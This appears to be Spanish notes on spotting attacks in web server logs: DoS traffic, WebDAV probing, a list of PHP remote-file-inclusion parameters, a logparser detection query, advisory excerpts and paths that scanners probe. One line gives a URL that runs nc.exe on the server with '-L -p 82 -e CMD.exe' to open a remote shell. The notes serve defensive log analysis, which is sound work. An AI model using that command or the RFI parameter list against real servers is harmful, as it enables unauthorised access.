Con DoSHTTP se hace una denegación de servicio que podemos ver en los logs del servidor

2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -

cadaver/0.23.2+neon/0.28.0
cadaver/0.23.0+neon/0.28.2

Versiones de Cadaver parcheado para acceder a fallo WebDav

2009-11-12 13:53:29 192.168.1.34 GET /re.asp 404 Mozilla/5.0+(Firefox/3.5.5
2009-11-12 13:53:37 192.168.1.34 GET /r/re.asp 200 Mozilla/5.0+(Firefox/3.5.5
2009-11-15 19:28:02 192.168.1.34 GET /re.asp 404 ia_archiver+(+http://www.alexa.com/site/help/webmasters;+crawler@alexa.com)
2009-11-15 19:28:10 192.168.1.34 GET /re/re.asp 200 ia_archiver+(+http://www.alexa.com/site/help/webmasters;+crawler@alexa.com)

Alexa recorre las págians gracias a su barra y depués de tres días

Variables que se utilizan en los RFI:

&glob
&glob[rootDir]
AIbasedir
CLPATH
CMS_ADMIN_PAGE
CONFIG[MWCHAT_Libs]
CONFIG[path]
CONFIG_EXT[LANGUAGES_DIR]
CPG_M_DIR
Cat
Config_rootdir
DIR
DIR_LIBS
FM
GALLERY_BASEDIR
GLOBALS['mosConfig_absolute_path']
GLOBALS[AA_INC_PATH]
GLOBALS[CLPath]
GLOBALS[includeBit]
GLOBALS[language_home]
GLOBALS[mosConfig_absolute_path]
GLOBALS[rootdp]
G_PATH
HCL_path
HTTP_POST_VARS
IP
Include
LOCAL_PATH
LangCookie
MAIN_PATH
ME
PATH
PATH_Includes
PGV_BASE_DIRECTORY
PHORUM[settings_dir]
REX[INCLUDE_PATH]
Server
THEME_DIR
VoteBoxPath
[Home]
_AMGconfig[cfg_serverpath]
_AMLconfig[cfg_serverpath]
_AMVconfig[cfg_serverpath]
_CCFG[_PKG_PATH_DBSE]
_PX_config[manager_path]
_REQUEST
_REQUEST[option]
_SERVER[DOCUMENT_ROOT]
a
absolute_path
act
action
addpoll
adminpath
agendax_path
alpath
apa_module_basedir
app_path
appdir
archive
arquivo
azione
b2inc
baccio
base
baseDir
base_dir
base_path
basepath
bbPath
bbPath[path]
bkpwp_plugin_path
boarddir
c
cal_dir
cfgProgDir
chem_absolu
childwindow.inc.php?form
clarolineRepositorySys
classes_dir
client
cmd
cnkey
coID
component_dir
conf
confdir
config
configFile
config[image_module]
config[include_path]
config[path_admin_include]
config[path_src_include]
config[search_disp]
config_atkroot
configbasedir
cont
content
conteudo
cropimagedir
css_path
custom
cutepath
dPconfig[root_dir]
data
dept
dir[base]
dir[func]
do
dsp
emailreader_ini
eqdkp_root_path
error
f
ff_compath
fil_config
file
file_newsportal
filnavn
fromTemplate
from_market
function
g_meta_inc_dir
g_meta_include_file
glob[rootDir]
go
gorumDir
hc
inc
inc_dir
incdir
includeFooter
includePath
include_dir
include_file
include_location
include_path
includedir
includes_dir
inhalt
kietu[url_hit]
kobr
l
lang
language_dir
layerstyle
left
lg
libpach
libpath
lm_absolute_path
lng
logfile
login
lvc_include_dir
m2f_root_path
m
mainpage
match
meio.php
meio
mode
modpath
module_path]
module_root_path
mosConfig_absolute_path
mosConfig_live_site
myPath
name
newsSync_enable_phpnuke_mod
news_file
nic
noSet
no_connect
nphp_config[LangFile]
o
opcao
open
openfile
openid_root_path
option
ort
p
pag
page
pageurl
pagina
path[docroot]
path_local
path_pre
path_to_bt_dir
path_to_news
pathtoashnews
pg
phgdir
phpAds_path
phpEx
phpbb_root_dir
phpbb_root_path
phpc_root_path
pilih
pivot_path
place
pm_path
pollname
prefix
principal
pun_root
quezza_root_path
rage
relative_script_path
rep
req_path
returnpath
root
root_dir
root_path
rootagenda
rub
s
sayfa
sbp
script_root
seccion
sel
serverPath
server_inc
setmodules
settings[locale]
settings_dir
sfx
show
side
site
site_path
siteurl
smf_root_path
sourcedir
spaw_root
sqld
systempath
t
t_core_path
template
theme_path
thisdir
thispath
tpl_pgb_moddir
url
user_inc
val1
visualizar
vsDragonRootPath
vwar_root2
vwar_root
wkPath
wpPATH
x
xcomicRootPath
xoopsConfig[xoops_url]
xoops_redirect

Consulta para sacar las variables:

logparser “SELECT * FROM ‘C:\logs\*’ where [cs-uri-query] like ‘%=http%’” -i:W3C -o:DATAGRID

Para poder ejecutar remotamente nc.exe, introducimos esta cadena en la dirección url:

http://192.168.1.33/cg/nc.exe?-L -p 82 -e CMD.exe

Entrada en el log:

GET /cg/nc.exe -L%20-p%2082%20-e%20CMD.exe

El ping de la muerte consiste en mandar paquetes ICMP de gran tamaño. Existe otro tipo de ping muy dañino para el bolsillo, si enviamos paquetes menores de 65.535 bytes a un servidor que tarifica por bytes, ¿qué sucede?, que podemos estar cobrando a los clientes de esos servidores por un tráfico que no realizan.

Input passed to the “systempath” parameter in ImpExData.php, ImpExModule.php, ImpExController.php, and ImpExDisplay.php isn’t properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

Source: http://secunia.com/advisories/19352/

Input passed to the “REX[INCLUDE_PATH]” parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Source: http://secunia.com/advisories/20395/

¿Qué S.O. estoy estoy buscando?

http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/

Para engañar a estos buscadores de tesoros podemos añadir una variable HTTP Headers con la palabra unix (Custom HTTP headers), de esta forma se piensan que están atacando un sistema Unix y realmente es un entorno Microsoft.

Incluir las carpetas que rastrean normalmente los scanners para ver el ataque que intentan:

• /user/soapCaller.bs
• /roundcube/
• /webmail/
• /abc.php
• /pp/anp.php
• /thisdoesnotexistahaha.php
• /cmd.php
• /portal/cacti/cmd.php
• /portal/cmd.php
• /stats/cmd.php